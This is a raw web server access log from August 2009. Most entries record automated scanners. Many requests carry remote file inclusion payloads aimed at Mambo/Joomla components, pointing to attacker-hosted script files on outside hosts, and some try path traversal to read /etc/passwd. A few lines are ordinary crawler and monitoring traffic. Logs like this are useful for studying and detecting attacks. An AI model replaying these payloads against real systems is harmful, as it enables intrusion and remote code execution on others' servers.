163.24.136.10 - - [02/Aug/2009:06:11:47 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:50 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:51 -0400] "GET /logs/access_log.Q109060600/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:51 -0400] "GET /logs/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:51 -0400] "GET /port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:51 -0400] "GET /logs/access_log.Q109071900//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:53 -0400] "GET /port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:53 -0400] "GET /logs/access_log.Q109060600%20%20/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:53 -0400] "GET /logs/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:11:54 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:56 -0400] "GET /port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:56 -0400] "GET /logs/access_log.Q109060600/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:11:56 -0400] "GET /logs/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:00 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:00 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:12:00 -0400] "GET /logs/access_log.Q109051200/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:02 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:12:03 -0400] "GET /logs/access_log.Q109051200%20%20/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:05 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:06 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:06:12:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.153.226.14 - - [02/Aug/2009:06:12:15 -0400] "GET /port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:12:15 -0400] "GET /logs/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:12:15 -0400] "GET /logs/access_log.Q109060600/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:23 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:12:24 -0400] "GET /logs/access_log.Q109051200/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:12:28 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:34 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:37 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:12:46 -0400] "GET /logs/access_log.Q109071900%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:12:48 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:12:49 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:12:50 -0400] "GET /logs/access_log.Q109071500%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:12:50 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:13:00 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:13:00 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:13:19 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.18.102 - - [02/Aug/2009:06:13:22 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
94.23.18.102 - - [02/Aug/2009:06:13:22 -0400] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.18.102 - - [02/Aug/2009:06:13:22 -0400] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
220.123.239.163 - - [02/Aug/2009:06:13:26 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.18.102 - - [02/Aug/2009:06:13:30 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
216.117.172.131 - - [02/Aug/2009:06:13:31 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:13:40 -0400] "GET /logs/access_log.Q109061600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:14:03 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:14:06 -0400] "GET /logs/access_log.Q109071900%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:14:07 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:06:14:10 -0400] "GET /logs/error_log.Q109071400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.skyhd.or.kr/Lboard/img/zfxid.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:06:14:10 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.skyhd.or.kr/Lboard/img/zfxid.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:06:14:10 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.skyhd.or.kr/Lboard/img/zfxid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:06:14:10 -0400] "GET /logs/access_log.Q109071400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.skyhd.or.kr/Lboard/img/zfxid.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:14:36 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:06:14:57 -0400] "GET ///vwar/backup/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
65.111.165.164 - - [02/Aug/2009:06:14:58 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:14:58 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:14:58 -0400] "GET /logs/access_log.Q109051400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:14:59 -0400] "GET /logs/access_log.Q109052800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.122.158.207 - - [02/Aug/2009:06:15:00 -0400] "GET /logs/error_log.Q109071400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.skyhd.or.kr/Lboard/img/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
220.181.7.129 - - [02/Aug/2009:06:15:06 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
116.122.158.207 - - [02/Aug/2009:06:15:07 -0400] "GET /logs/access_log.Q109071400%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.skyhd.or.kr/Lboard/img/zfxid.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:15:11 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:15:45 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:15:53 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:16:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:16:00 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:16:00 -0400] "GET /logs/access_log.Q109061700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:16:20 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:16:21 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.123.239.163 - - [02/Aug/2009:06:16:30 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:16:31 -0400] "GET /logs/access_log.Q109061600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:16:32 -0400] "GET /logs/access_log.Q109061600%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.125.66.130 - - [02/Aug/2009:06:16:44 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
89.252.241.20 - - [02/Aug/2009:06:16:45 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:16:45 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:16:46 -0400] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:16:50 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.812"
209.59.12.99 - - [02/Aug/2009:06:17:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.252.241.20 - - [02/Aug/2009:06:17:11 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:17:11 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:17:11 -0400] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.812"
89.252.241.20 - - [02/Aug/2009:06:17:13 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.812"
65.111.165.164 - - [02/Aug/2009:06:17:18 -0400] "GET /logs/access_log.Q109051400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:17:19 -0400] "GET /logs/access_log.Q109052800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:06:17:45 -0400] "GET /images/items/EcOm/bonescrapers_thumb.jpg HTTP/1.0" 200 2372 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
65.111.165.164 - - [02/Aug/2009:06:18:04 -0400] "GET /logs/access_log.Q109061700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:18:13 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.245.25.6 - - [02/Aug/2009:06:18:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:18:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:18:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:18:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
163.24.136.10 - - [02/Aug/2009:06:18:37 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:06:18:40 -0400] "GET /logs/access_log.Q109061800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.120.227.242 - - [02/Aug/2009:06:18:48 -0400] "GET /logs/access_log.Q109070300//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.810"
58.120.227.242 - - [02/Aug/2009:06:18:48 -0400] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
58.120.227.242 - - [02/Aug/2009:06:18:49 -0400] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
121.130.29.11 - - [02/Aug/2009:06:19:05 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://for.caucasus.net/id.txt???? HTTP/1.1" 200 12010 "-" "libwww-perl/5.805"
121.130.29.11 - - [02/Aug/2009:06:19:05 -0400] "GET /logs/access_log.Q109060500///?_SERVER[DOCUMENT_ROOT]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
121.130.29.11 - - [02/Aug/2009:06:19:05 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://for.caucasus.net/id.txt???? HTTP/1.1" 200 453 "-" "libwww-perl/5.805"
216.117.172.131 - - [02/Aug/2009:06:19:55 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:19:57 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:06:19:58 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [02/Aug/2009:06:20:02 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.120.227.242 - - [02/Aug/2009:06:20:12 -0400] "GET /logs/error_log.Q109070300//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.810"
163.24.136.10 - - [02/Aug/2009:06:21:20 -0400] "GET /logs/access_log.Q109062700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:21:31 -0400] "GET /port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:21:31 -0400] "GET /logs/access_log.Q109060600/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:21:31 -0400] "GET /logs/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
217.153.226.14 - - [02/Aug/2009:06:21:39 -0400] "GET /logs/access_log.Q109051200/port.php?content=http://dronex.altervista.org/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:06:22:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
